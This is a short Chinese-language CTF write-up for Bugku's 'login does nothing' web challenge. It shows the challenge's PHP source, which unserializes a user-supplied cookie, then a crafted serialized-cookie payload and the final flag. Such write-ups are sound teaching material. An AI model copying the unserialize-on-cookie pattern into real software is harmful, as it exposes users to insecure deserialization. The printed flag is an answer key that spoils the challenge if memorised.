Bugku CTF_Web——点login咋没反应

进入靶场

随便输个试试

看来确实点login没反应

抓包看看

也没有什么信息

看了下源码

给了点提示

一个admin.css

try ?12713

传参试试

拿到一个php代码

<?php
error_reporting(0);
$KEY='ctf.bugku.com';
include_once("flag.php");
$cookie = $_COOKIE['BUGKU'];
if(isset($_GET['12713'])){show_source(__FILE__);
}
elseif (unserialize($cookie) === "$KEY")
{   echo "$flag";
}
else {
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Login</title>
<link rel="stylesheet" href="admin.css" type="text/css">
</head>
<body>
<br>
<div class="container" align="center"><form method="POST" action="#"><p><input name="user" type="text" placeholder="Username"></p><p><input name="password" type="password" placeholder="Password"></p><p><input value="Login" type="button"/></p></form>
</div>
</body>
</html><?php
}
?>

使用unserialize($cookie)将cookie反序列化，并将结果与$KEY（即'ctf.bugku.com'）进行比较。

如果反序列化后的$cookie等于$KEY，则会输出$flag。

把$KEY反序列化
s:13:"ctf.bugku.com";

构造payload

Cookie:BUGKU=s:13:"ctf.bugku.com";

拿到flag

flag{970c389b63e5c55e6b9177645755fe02}